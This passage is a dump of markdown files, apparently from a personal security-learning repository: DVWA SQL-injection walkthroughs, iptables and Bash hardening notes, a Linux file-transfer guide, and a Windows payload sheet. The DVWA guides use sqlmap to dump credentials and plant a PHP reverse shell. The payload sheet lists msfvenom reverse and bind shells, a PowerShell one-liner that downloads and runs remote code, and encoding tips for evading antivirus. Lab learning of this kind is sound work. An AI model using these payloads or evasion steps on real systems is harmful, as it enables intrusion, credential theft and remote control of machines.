**“Create / Reset Database”**. 27 | 3. Log in with **admin/password**. 28 | 4. 
Set **DVWA Security Level to Low** (Go to `DVWA Security` settings). 29 | 30 | --- 31 | 32 | ## **2. Exploiting SQL Injection with SQLmap** 33 | Once DVWA is running, find a vulnerable parameter. 34 | 35 | ### **2.1 Identify a Vulnerable Endpoint** 36 | Go to `http://localhost/dvwa/vulnerabilities/sqli/` and enter: 37 | ```sql 38 | ' OR 1=1 -- 39 | ``` 40 | If the response changes, the parameter is vulnerable. 41 | 42 | ### **2.2 Use SQLmap to Exploit the Vulnerability** 43 | Run SQLmap to detect SQL injection on DVWA: 44 | ```bash 45 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --dbs 46 | ``` 47 | Replace `PHPSESSID=xxxxx` with your session ID from the browser (Inspect > Storage > Cookies). 48 | 49 | This command: 50 | ✅ Identifies databases in MySQL 51 | 52 | ### **2.3 Extract Tables and Columns** 53 | Find tables in `dvwa` database: 54 | ```bash 55 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa --tables 56 | ``` 57 | Find columns in the `users` table: 58 | ```bash 59 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --columns 60 | ``` 61 | 62 | ### **2.4 Dump User Credentials** 63 | ```bash 64 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --dump 65 | ``` 66 | ✅ This extracts **usernames and hashed passwords**. 67 | 68 | --- 69 | 70 | ## **3. Gaining Shell Access via Metasploit** 71 | We will now escalate the attack using **Metasploit**. 72 | 73 | ### **3.1 Check if Command Execution is Possible** 74 | ```bash 75 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --os-shell 76 | ``` 77 | If successful, you’ll get an interactive shell. 
78 | 79 | ### **3.2 Inject a Metasploit Reverse Shell** 80 | 1. Open Metasploit: 81 | ```bash 82 | msfconsole 83 | ``` 84 | 85 | 2. Set up a listener: 86 | ```bash 87 | use exploit/multi/handler 88 | set payload php/meterpreter/reverse_tcp 89 | set LHOST 90 | set LPORT 4444 91 | exploit 92 | ``` 93 | 94 | 3. Inject a PHP reverse shell using SQLmap: 95 | ```bash 96 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --file-write=/var/www/html/dvwa/shell.php --file-dest=/var/www/html/dvwa/shell.php 97 | ``` 98 | 99 | 4. Execute the shell: 100 | ``` 101 | curl http://localhost/dvwa/shell.php 102 | ``` 103 | Now check your Metasploit listener—**you should have a meterpreter session**. 104 | 105 | --- 106 | 107 | ## **4. Post-Exploitation** 108 | Once inside, you can: 109 | ✅ **Dump database contents** 110 | ✅ **Escalate privileges** 111 | ✅ **Download sensitive files** 112 | 113 | Try: 114 | ```bash 115 | meterpreter> sysinfo 116 | meterpreter> shell 117 | ``` 118 | 119 | --- 120 | 121 | ## **5. Mitigation & Defense** 122 | To prevent SQL Injection: 123 | ✅ Use **Prepared Statements** 124 | ✅ **Sanitize Input** (`htmlspecialchars()`, `mysqli_real_escape_string()`) 125 | ✅ **Limit Database Privileges** 126 | ✅ Use a **Web Application Firewall (WAF)** 127 | -------------------------------------------------------------------------------- /projects/dvwa_low.md: -------------------------------------------------------------------------------- 1 | # **Exploiting SQL Injection on DVWA (Low Level) Manually & Using SQLmap** 2 | 3 | In this guide, we will perform **SQL Injection (SQLi) exploitation** on **Damn Vulnerable Web Application (DVWA)** with security set to **Low**. 4 | 5 | We will cover **both manual exploitation and automation using SQLmap**. 6 | 7 | --- 8 | 9 | ## **1. Setting Up DVWA** 10 | Before attacking, make sure **DVWA is running** on your system. 
11 | 12 | ### **1.1 Start Services** 13 | If you're using **Kali Linux**, start Apache and MySQL: 14 | ```bash 15 | sudo systemctl start apache2 16 | sudo systemctl start mysql 17 | ``` 18 | 19 | ### **1.2 Log into DVWA** 20 | 1. Open your browser and go to: 21 | ``` 22 | http://localhost/dvwa/ 23 | ``` 24 | 2. Use default credentials: 25 | ``` 26 | Username: admin 27 | Password: password 28 | ``` 29 | 3. Set **Security Level to Low**: 30 | - Navigate to **DVWA Security** 31 | - Change **Security Level** to **Low** 32 | - Click **Submit** 33 | 34 | --- 35 | 36 | ## **2. Manual SQL Injection Exploitation** 37 | We'll manually test **SQL Injection on the User ID field**. 38 | 39 | ### **2.1 Identifying a Vulnerability** 40 | 1. Go to **SQL Injection page**: 41 | ``` 42 | http://localhost/dvwa/vulnerabilities/sqli/ 43 | ``` 44 | 2. Enter a **single quote (`'`)** in the input box and click **Submit**. 45 | 46 | **Example Input:** 47 | ``` 48 | ' 49 | ``` 50 | If you see an error like: 51 | ``` 52 | You have an error in your SQL syntax 53 | ``` 54 | ✅ **The application is vulnerable to SQL injection.** 55 | 56 | --- 57 | 58 | ### **2.2 Bypassing Authentication** 59 | Now, let's **bypass authentication** using SQL injection. 60 | 61 | 1. Enter the following payload in the **User ID** field: 62 | ``` 63 | 1' OR 1=1 -- 64 | ``` 65 | 2. Click **Submit**. 66 | 67 | **Explanation:** 68 | - `1' OR 1=1 --` **always evaluates to TRUE**, returning all users. 69 | - The `--` **comments out the rest of the SQL query**. 70 | 71 | --- 72 | 73 | ### **2.3 Extracting Database Version** 74 | Enter the following payload in **User ID**: 75 | ```sql 76 | 1' UNION SELECT null, @@version -- 77 | ``` 78 | ✅ This will **return the database version**. 
79 | 80 | --- 81 | 82 | ### **2.4 Listing All Database Tables** 83 | Use: 84 | ```sql 85 | 1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() -- 86 | ``` 87 | ✅ **Returns table names** in the current database. 88 | 89 | --- 90 | 91 | ### **2.5 Extracting User Credentials** 92 | Use: 93 | ```sql 94 | 1' UNION SELECT null, concat(user, ':', password) FROM users -- 95 | ``` 96 | ✅ **Extracts usernames and passwords.** 97 | 98 | --- 99 | 100 | ## **3. Automating SQL Injection Using SQLmap** 101 | Now, let's use **SQLmap** to automate the attack. 102 | 103 | ### **3.1 Capture Request Data** 104 | 1. Open **DVWA's SQL Injection page**. 105 | 2. **Intercept the request** using **Burp Suite** or browser developer tools. 106 | 3. Identify the vulnerable URL: 107 | ``` 108 | http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit 109 | ``` 110 | 111 | --- 112 | 113 | ### **3.2 Enumerating Databases** 114 | Run SQLmap: 115 | ```bash 116 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" --dbs 117 | ``` 118 | ✅ **Lists all databases**. 119 | 120 | --- 121 | 122 | ### **3.3 Extracting Tables** 123 | Find tables in `dvwa`: 124 | ```bash 125 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa --tables 126 | ``` 127 | ✅ **Lists table names**. 128 | 129 | --- 130 | 131 | ### **3.4 Extracting Columns from `users` Table** 132 | ```bash 133 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --columns 134 | ``` 135 | ✅ **Lists column names**. 
136 | 137 | --- 138 | 139 | ### **3.5 Dumping Usernames & Passwords** 140 | ```bash 141 | sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxxxx; security=low" -D dvwa -T users --dump 142 | ``` 143 | ✅ **Extracts all user credentials.** 144 | 145 | --- 146 | 147 | ## **4. Preventing SQL Injection** 148 | To **mitigate SQLi vulnerabilities**: 149 | ✅ Use **Prepared Statements** 150 | ✅ Sanitize user input 151 | ✅ Apply **least privilege** to database users 152 | ✅ Enable **Web Application Firewalls (WAF)** 153 | -------------------------------------------------------------------------------- /week2/day8_netlify.md: -------------------------------------------------------------------------------- 1 | ### **Netfilter: The Backbone of Linux Packet Manipulation** 2 | 3 | Netfilter is an integral part of the Linux kernel that enables the inspection, manipulation, and control of network packets as they traverse the networking stack. Its modular and extensible design allows system administrators to define custom packet-handling rules, making it a versatile tool for tasks like firewall management, Network Address Translation (NAT), and traffic shaping. 4 | 5 | --- 6 | 7 | ### **Key Features of Netfilter** 8 | 9 | 1. **Packet Filtering**: Control incoming and outgoing traffic by applying rules to accept, reject, or drop packets. 10 | 2. **Network Address Translation (NAT)**: Modify packet headers to translate between private and public IP addresses. 11 | 3. **Packet Logging**: Monitor and debug network traffic by logging packets that meet certain criteria. 12 | 4. **Custom Hooks**: Extend functionality by inserting user-defined hooks into the kernel's networking stack. 13 | 5. **Traffic Shaping**: Prioritize or limit bandwidth usage for specific traffic types. 
14 | 15 | --- 16 | 17 | ### **Netfilter Hook Points** 18 | 19 | Netfilter provides several hook points in the Linux networking stack where packets can be intercepted and processed: 20 | 21 | 1. **PREROUTING**: Modify packets before routing decisions are made. 22 | 2. **INPUT**: Process packets destined for the local system. 23 | 3. **FORWARD**: Handle packets that are routed through the system but not destined for it. 24 | 4. **OUTPUT**: Process packets originating from the local system. 25 | 5. **POSTROUTING**: Modify packets after routing decisions are made. 26 | 27 | --- 28 | 29 | ### **Using `iptables` with Netfilter** 30 | 31 | The `iptables` utility is the user-space interface for configuring Netfilter rules. Below is an example of creating a simple firewall rule: 32 | 33 | #### **Example Command** 34 | ```bash 35 | iptables -A INPUT -i eth0 -s 192.168.0.0/24 -m conntrack --ctstate NEW -j DROP 36 | ``` 37 | 38 | #### **Explanation**: 39 | - `-A INPUT`: Appends a new rule to the `INPUT` chain. 40 | - `-i eth0`: Specifies the network interface (`eth0`) to apply the rule to. 41 | - `-s 192.168.0.0/24`: Limits the rule to traffic originating from the `192.168.0.0/24` subnet. 42 | - `-m conntrack`: Uses the `conntrack` module for connection tracking. 43 | - `--ctstate NEW`: Targets new connection attempts. 44 | - `-j DROP`: Drops matching packets. 45 | 46 | --- 47 | 48 | ### **Advanced Use Cases** 49 | 50 | 1. **Network Address Translation (NAT)** 51 | ```bash 52 | iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 53 | ``` 54 | - Enables masquerading for outbound traffic on `eth0`. 55 | 56 | 2. **Port Forwarding** 57 | ```bash 58 | iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 192.168.1.10:80 59 | ``` 60 | - Forwards incoming traffic on port `8080` to `192.168.1.10:80`. 61 | 62 | 3. 
**Logging Packets**
```bash
# LOG is a non-terminating target: it records the packet and passes it to the next rule.
# Pair it with a DROP directly after it so the prefix only marks packets that are really dropped.
iptables -A INPUT -j LOG --log-prefix "Dropped Packet: "
iptables -A INPUT -j DROP
```
- Logs every packet that reaches the end of the `INPUT` chain with the prefix `"Dropped Packet: "`, then drops it. A `LOG` rule on its own records all packets that reach it, whether or not a later rule drops them, so keep the two rules adjacent and at the end of the chain.

---

### **Netfilter Framework Components**

1. **Tables**: Organize rules into groups. Common tables include:
   - `filter`: Default table for packet filtering.
   - `nat`: Handles NAT rules.
   - `mangle`: For advanced packet modifications.

2. **Chains**: Logical groupings of rules applied to packets. Common chains include:
   - `INPUT`, `OUTPUT`, `FORWARD` (for filtering).
   - `PREROUTING`, `POSTROUTING` (for NAT/mangling).

3. **Targets**: Actions taken when a rule matches:
   - `ACCEPT`: Allow the packet.
   - `DROP`: Silently discard the packet.
   - `LOG`: Log the packet for analysis.

---

### **Future of Netfilter and Alternatives**

While `iptables` has been a long-standing tool, its successor `nftables` is gaining popularity due to improved performance and simplified rule management. `nftables` is built on the same Netfilter framework but offers a unified syntax and better scalability.

#### Example `nftables` Command:
```bash
# assumes the `ip filter` table and its `input` chain already exist
nft add rule ip filter input ip saddr 192.168.0.0/24 drop
```

---

### **Practical Applications**

- **Firewall Rules**: Secure Linux servers by filtering unwanted traffic.
- **NAT**: Enable internet access for devices on a private network.
- **Traffic Analysis**: Debug and monitor network activity.
- **Intrusion Detection**: Detect and block suspicious packets.
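Putting the pieces above together (default-deny policy, `conntrack` state matching, and a `LOG` rule placed directly before the final `DROP`) as an added example that is not part of the original notes. It emits the ruleset in `iptables-restore` format and lints it before anything is applied; the interface `eth0`, admin subnet `10.0.0.0/24` and SSH port `22` are constructed defaults.

```shell
#!/bin/sh
# Added example, not part of the original notes: generate a default-deny INPUT
# ruleset in iptables-restore format and lint it before it is applied.
# The interface (eth0), admin subnet (10.0.0.0/24) and SSH port (22) are
# constructed defaults for this example.
set -eu

# gen_ruleset [IFACE] [ADMIN_NET] [SSH_PORT] : print the ruleset to stdout
gen_ruleset() {
    iface="${1:-eth0}"
    admin_net="${2:-10.0.0.0/24}"
    ssh_port="${3:-22}"
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
# loopback and replies to connections we opened come first
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
# only the admin network may open new SSH sessions on ${iface}
-A INPUT -i ${iface} -p tcp --dport ${ssh_port} -s ${admin_net} -m conntrack --ctstate NEW -j ACCEPT
# rate-limited LOG followed directly by DROP: every "Dropped Packet:" line is a real drop
-A INPUT -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix "Dropped Packet: " --log-level 4
-A INPUT -j DROP
COMMIT
EOF
}

# lint_ruleset : read a ruleset on stdin; exit 0 only if it passes all checks
lint_ruleset() {
    rules=$(cat)
    # 1. the chain must fail closed
    printf '%s\n' "$rules" | grep -q '^:INPUT DROP' \
        || { echo "lint: INPUT policy is not DROP" >&2; return 1; }
    # 2. LOG must come before the unconditional DROP, or nothing gets logged
    log_line=$(printf '%s\n' "$rules" | grep -n -- '-j LOG' | head -n 1 | cut -d: -f1)
    drop_line=$(printf '%s\n' "$rules" | grep -n -- '^-A INPUT -j DROP$' | cut -d: -f1)
    if [ -z "$log_line" ] || [ -z "$drop_line" ] || [ "$log_line" -ge "$drop_line" ]; then
        echo "lint: LOG rule must precede the final DROP" >&2; return 1
    fi
    # 3. an ACCEPT after the final DROP can never match (dead rule)
    if printf '%s\n' "$rules" | tail -n +"$((drop_line + 1))" | grep -q -- '-j ACCEPT'; then
        echo "lint: rule after the final DROP is unreachable" >&2; return 1
    fi
    return 0
}

# Review, then load:  gen_ruleset eth0 10.0.0.0/24 22 | sudo iptables-restore --test
gen_ruleset "$@" | lint_ruleset && echo "ruleset OK"
```

`iptables-restore --test` parses the ruleset without loading it, which is the last check before `iptables-restore` replaces the live `filter` table.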
--------------------------------------------------------------------------------
/shell_week/os_hardening_bash.md:
--------------------------------------------------------------------------------
## 🛡️ Bash Scripting Program for OS Hardening (Beginner to Advanced)

---

### 📘 Module 1: Introduction to Bash Scripting (Beginner)

**Topics Covered:**

* What is Bash?
* Writing and executing your first script
* Variables, conditionals, loops
* Permissions and running scripts safely

**Practice Scripts:**

1. **Hello World Script**

```bash
#!/bin/bash
echo "Hello, welcome to OS Hardening!"
```

2. **User Info Script**

```bash
#!/bin/bash
echo "Current User: $(whoami)"
echo "Home Directory: $HOME"
```

3. **File Permission Checker**

```bash
#!/bin/bash
echo "Enter file name:"
read -r filename          # -r keeps backslashes literal
ls -l -- "$filename"      # quoted so a name with spaces is one argument; -- ends option parsing
```

---

### 📙 Module 2: Intermediate Bash + Basic OS Hardening

**Topics Covered:**

* File permissions and ownership
* Password policy enforcement
* User and group management
* Basic auditing

**Practice Scripts:**

1. **Set Strong Password Policy**

```bash
#!/bin/bash
# Edits /etc/login.defs in place; run as root and keep a backup first (sed -i.bak).
# Only existing PASS_* lines are rewritten, so check the file afterwards.
echo "Setting strong password policy..."
sed -i 's/^PASS_MAX_DAYS.*/PASS_MAX_DAYS 90/' /etc/login.defs
sed -i 's/^PASS_MIN_DAYS.*/PASS_MIN_DAYS 10/' /etc/login.defs
sed -i 's/^PASS_WARN_AGE.*/PASS_WARN_AGE 7/' /etc/login.defs
echo "Password policy updated."
```

2. **Disable Unused Users**

```bash
#!/bin/bash
echo "Disabling guest account..."
usermod -L guest    # -L locks the password; the account and its files remain
echo "Guest account locked."
```

3. 
**Audit Critical Files**

```bash
#!/bin/bash
files=("/etc/passwd" "/etc/shadow" "/etc/hosts")
for file in "${files[@]}"; do
    echo "Checking $file..."
    ls -l "$file"    # quoted: an unquoted path would be word-split by the shell
done
```

---

### 📕 Module 3: Advanced OS Hardening with Bash

**Topics Covered:**

* Automating system updates
* Configuring firewall with `ufw` or `iptables`
* Securing SSH
* Disabling dangerous services

**Practice Scripts:**

1. **Secure SSH Configuration**

```bash
#!/bin/bash
# These patterns only rewrite commented-out defaults; an explicit existing setting keeps
# its value, so confirm the result with: sshd -T | grep -Ei 'port|permitrootlogin|passwordauthentication'
echo "Securing SSH..."
sed -i 's/^#Port 22/Port 2222/' /etc/ssh/sshd_config
sed -i 's/^#PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sed -i 's/^#PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sshd -t && systemctl restart sshd    # validate the config first so a typo cannot lock you out
echo "SSH secured."
```

2. **Disable Unnecessary Services**

```bash
#!/bin/bash
services=("telnet" "ftp" "rsh" "rlogin")
for s in "${services[@]}"; do
    systemctl disable "$s" 2>/dev/null   # errors are silenced for units that are not installed
    systemctl stop "$s" 2>/dev/null
    echo "Disabled $s"
done
```

3. **Enable and Configure Firewall (UFW)**

```bash
#!/bin/bash
echo "Configuring UFW Firewall..."
ufw default deny incoming
ufw default allow outgoing
ufw allow 2222/tcp    # SSH on custom port; must match sshd_config before enabling
ufw --force enable    # --force skips the interactive confirmation so the script does not hang
echo "Firewall enabled and configured."
```

---

### 📗 Module 4: Pro-Level Projects & Automation

**Topics Covered:**

* Creating compliance check scripts
* CIS Benchmark checks (basic)
* Log monitoring automation
* Hardened system audit reports

**Project Ideas:**

1. 
**Automated Security Checklist Script**

* Check kernel version
* Check for open ports
* Check password aging policy
* Check firewall status
* Output report to a file

2. **System Update & Log Cleanup**

```bash
#!/bin/bash
echo "Updating system and cleaning logs..."
apt update && apt upgrade -y
journalctl --vacuum-time=7d    # keep only the last 7 days of journal entries
echo "System updated and logs cleaned."
```

3. **Create Weekly Cron Job for Hardening Script**

```bash
#!/bin/bash
cp hardening-script.sh /usr/local/bin/
chmod 700 /usr/local/bin/hardening-script.sh    # cron runs it as root, so nobody else should be able to edit it
# minute hour day-of-month month day-of-week: every Sunday at 02:00
echo "0 2 * * 0 root /usr/local/bin/hardening-script.sh" > /etc/cron.d/weekly-hardening
echo "Scheduled hardening script."
```

* Sets password policy
* Disables root login
* Updates the system
* Enables firewall
* Scans for open ports
* Creates a security audit report

--------------------------------------------------------------------------------
/week2/day10_file_transfer.md:
--------------------------------------------------------------------------------
### **Linux File Transfer in Networking**

File transfer in Linux involves copying or moving files from one computer to another over a network connection. This functionality is crucial for system administrators and users who need to share data across systems or collaborate in networked environments.

---

### **Common File Transfer Tools in Linux**

Linux provides several tools for transferring files over a network. These tools support a range of protocols such as **FTP**, **HTTP**, **SCP**, **SFTP**, and **NFS**. Each protocol and tool is tailored for specific use cases, offering different levels of security, speed, and flexibility.

---

### **Key File Transfer Commands**

1. 
**`scp` (Secure Copy Protocol)** 16 | A secure method for transferring files between a local and a remote machine or between two remote machines using SSH. 17 | 18 | **Syntax:** 19 | ```bash 20 | scp /path/to/local/file username@remote:/path/to/destination 21 | ``` 22 | **Example:** 23 | ```bash 24 | scp ~/documents/report.txt user@192.168.1.100:/home/user/reports/ 25 | ``` 26 | 27 | 2. **`rsync`** 28 | A powerful tool for file transfer and synchronization, allowing incremental transfers to save bandwidth. 29 | 30 | **Syntax:** 31 | ```bash 32 | rsync -avz /path/to/local/file username@remote:/path/to/destination 33 | ``` 34 | **Example:** 35 | ```bash 36 | rsync -avz ~/projects/ user@192.168.1.100:/home/user/backups/ 37 | ``` 38 | 39 | 3. **`wget`** 40 | A command-line utility for downloading files from web servers using HTTP, HTTPS, or FTP protocols. 41 | 42 | **Syntax:** 43 | ```bash 44 | wget http://example.com/file.tar.gz 45 | ``` 46 | **Example:** 47 | ```bash 48 | wget https://example.com/software.zip 49 | ``` 50 | 51 | 4. **`curl`** 52 | A versatile tool for transferring data to/from a server using various protocols. 53 | 54 | **Syntax:** 55 | ```bash 56 | curl -O http://example.com/file.tar.gz 57 | ``` 58 | **Example:** 59 | ```bash 60 | curl -O https://example.com/document.pdf 61 | ``` 62 | 63 | 5. **`sftp` (Secure File Transfer Protocol)** 64 | A secure method for transferring files via SSH. 65 | 66 | **Interactive Session Example:** 67 | ```bash 68 | sftp username@remote 69 | > put /path/to/local/file /path/to/remote/destination 70 | ``` 71 | 72 | 6. **`ftp`** 73 | A less secure, legacy protocol for file transfers. 
74 | 75 | **Example Session:** 76 | ```bash 77 | ftp remote-server.com 78 | > put localfile.txt remotefile.txt 79 | ``` 80 | 81 | --- 82 | 83 | ### **Example: Transferring Files Between Systems** 84 | 85 | - **Local to Remote** 86 | ```bash 87 | scp file.txt user@192.168.1.10:/home/user/ 88 | ``` 89 | 90 | - **Remote to Local** 91 | ```bash 92 | scp user@192.168.1.10:/home/user/file.txt /local/path/ 93 | ``` 94 | 95 | - **Synchronize Directories** 96 | ```bash 97 | rsync -avz /local/directory/ user@192.168.1.10:/remote/directory/ 98 | ``` 99 | 100 | --- 101 | 102 | ### **File Transfer Protocols Overview** 103 | 104 | | **Protocol** | **Description** | **Security** | **Use Case** | 105 | |--------------|------------------------------------------------|--------------------------|--------------------------------------------| 106 | | FTP | File Transfer Protocol (basic and outdated). | No encryption. | Legacy systems, basic transfers. | 107 | | SFTP | Secure FTP using SSH. | Encrypted and secure. | Secure file transfers and uploads. | 108 | | SCP | Secure Copy Protocol (over SSH). | Encrypted and secure. | Simple and secure transfers. | 109 | | Rsync | Synchronization protocol with incremental transfers. | Encrypted (with SSH). | Backups, directory synchronization. | 110 | | HTTP/HTTPS | Web protocols for downloads. | Secure with HTTPS. | File downloads and web-based sharing. | 111 | 112 | --- 113 | 114 | ### **Security Best Practices for File Transfer** 115 | 116 | 1. **Use Secure Protocols:** Prefer `scp`, `rsync`, or `sftp` over FTP to ensure encryption and data security. 117 | 2. **Limit Access:** Restrict file transfer permissions to specific users and directories. 118 | 3. **Verify Transfers:** Use checksums (e.g., `md5sum`, `sha256sum`) to ensure file integrity. 119 | 4. **Automate Transfers:** Use scripts and cron jobs for scheduled or repetitive file transfers. 
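Best practice 3 (verify transfers with checksums) carried through end to end, as an added example that is not part of the original notes: a SHA-256 manifest in the format `sha256sum -c` reads is produced before the copy, travels with the files, and is checked after the copy so a corrupted or tampered file is reported. The directories and file contents are constructed for the example; `cp` stands in for `scp`/`rsync`.

```shell
#!/bin/sh
# Added example, not part of the original notes: a checksum-verified transfer.
# A SHA-256 manifest (same format sha256sum -c reads) is written on the sending
# side, shipped alongside the files, and checked on the receiving side so a
# corrupted or tampered file is reported rather than silently accepted.
# All directories and file contents below are constructed for this example.
set -eu

# hash_file FILE : print the SHA-256 digest only (GNU coreutils or BSD/macOS)
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# make_manifest DIR : one "<digest>  <relative path>" line per file, sorted
make_manifest() {
    ( cd "$1" && find . -type f | sort | while read -r f; do
        printf '%s  %s\n' "$(hash_file "$f")" "${f#./}"
    done )
}

# verify_manifest MANIFEST DIR : prints one status line per entry and
# returns 0 only when every file is present with the expected digest
verify_manifest() {
    bad=0
    while read -r expected path; do
        if [ ! -f "$2/$path" ]; then
            echo "MISSING: $path"; bad=$((bad + 1))
        elif [ "$(hash_file "$2/$path")" != "$expected" ]; then
            echo "FAILED:  $path"; bad=$((bad + 1))
        else
            echo "OK:      $path"
        fi
    done < "$1"
    [ "$bad" -eq 0 ]
}

# demo : "sends" two files, then corrupts one on the receiving side;
# prints "<clean-copy status> <failed count>", expected "0 1"
demo() {
    work=$(mktemp -d)
    mkdir -p "$work/src/reports" "$work/dst"
    printf 'quarterly figures\n' > "$work/src/reports/q1.txt"
    printf 'config=prod\n'       > "$work/src/app.conf"
    make_manifest "$work/src" > "$work/SHA256SUMS"
    cp -R "$work/src/." "$work/dst/"          # stands in for scp/rsync/sftp
    if verify_manifest "$work/SHA256SUMS" "$work/dst" >/dev/null; then clean=0; else clean=1; fi
    printf 'config=debug\n' > "$work/dst/app.conf"   # bit flip or tampering in transit
    failed=$(verify_manifest "$work/SHA256SUMS" "$work/dst" | grep -c '^FAILED' || true)
    rm -rf "$work"
    echo "$clean $failed"
}

demo
```

On the receiving host the same manifest can be checked with `sha256sum -c SHA256SUMS`; the function above only adds explicit MISSING reporting and a portable digest helper.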
120 | 121 | By mastering these tools and practices, Linux users can efficiently manage file sharing across networks while ensuring data security and reliability. 122 | -------------------------------------------------------------------------------- /troubleshooting/windows-payloads.md: -------------------------------------------------------------------------------- 1 | For Windows 7 and 8, you can generate multiple **msfvenom** payloads depending on whether you want a **reverse shell**, **bind shell**, or a **staged/stageless Meterpreter** payload. Below are different payloads categorized for your needs. 2 | 3 | --- 4 | 5 | ## **1. Reverse Shell Payloads** 6 | These payloads connect back to your attacker's machine (**LHOST** = your IP). 7 | 8 | ### **Meterpreter Reverse TCP (Staged)** 9 | ``` 10 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe 11 | ``` 12 | - **Pros:** Stable, supports post-exploitation modules. 13 | - **Cons:** May be detected by AV. 14 | 15 | ### **Meterpreter Reverse HTTP** 16 | ``` 17 | msfvenom -p windows/meterpreter/reverse_http LHOST= LPORT=8080 -f exe > shell.exe 18 | ``` 19 | - **Pros:** Evades some firewalls using HTTP. 20 | - **Cons:** Slightly slower than TCP. 21 | 22 | ### **Meterpreter Reverse HTTPS** 23 | ``` 24 | msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe > shell.exe 25 | ``` 26 | - **Pros:** Encrypted communication to evade detection. 27 | - **Cons:** Slightly higher latency. 28 | 29 | ### **Stageless Meterpreter Reverse TCP** 30 | ``` 31 | msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe 32 | ``` 33 | - **Pros:** Single-stage (faster execution). 34 | - **Cons:** Larger file size. 35 | 36 | --- 37 | 38 | ## **2. Bind Shell Payloads** 39 | These payloads **open a port on the target** machine, and you connect to it. 
40 | 41 | ### **Windows Bind Shell (Staged)** 42 | ``` 43 | msfvenom -p windows/shell/bind_tcp LPORT=4444 -f exe > bind.exe 44 | ``` 45 | - **Pros:** No need for an attacker’s IP. 46 | - **Cons:** Might be blocked by firewalls. 47 | 48 | ### **Windows Bind Shell (Stageless)** 49 | ``` 50 | msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe > bind.exe 51 | ``` 52 | - **Pros:** No need for an external IP. 53 | - **Cons:** Less stealthy. 54 | 55 | --- 56 | 57 | ## **3. Powershell Payloads (Fileless)** 58 | These payloads execute **in memory** (useful for bypassing AV). 59 | 60 | ### **Powershell Reverse Shell** 61 | ``` 62 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh-cmd > shell.ps1 63 | ``` 64 | To execute on the target: 65 | ``` 66 | powershell -ExecutionPolicy Bypass -File shell.ps1 67 | ``` 68 | 69 | ### **Powershell One-Liner** 70 | ``` 71 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f psh > shell.txt 72 | ``` 73 | Execute it using: 74 | ``` 75 | powershell -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http:///shell.txt')" 76 | ``` 77 | 78 | --- 79 | 80 | ## **4. Encoded Payloads (Bypassing AV)** 81 | If AV is detecting the payload, try encoding it: 82 | ``` 83 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > encoded.exe 84 | ``` 85 | - **`-e x86/shikata_ga_nai`**: Encodes the payload. 86 | - **`-i 10`**: Increases encoding iterations. 87 | 88 | For further AV evasion, consider using a custom packer (Veil-Evasion, Shellter, or manual obfuscation). 89 | 90 | --- 91 | 92 | ## **5. DLL & HTA Payloads (Alternative Execution)** 93 | ### **DLL Payload** 94 | ``` 95 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > exploit.dll 96 | ``` 97 | Can be injected into a process using `rundll32.exe`. 
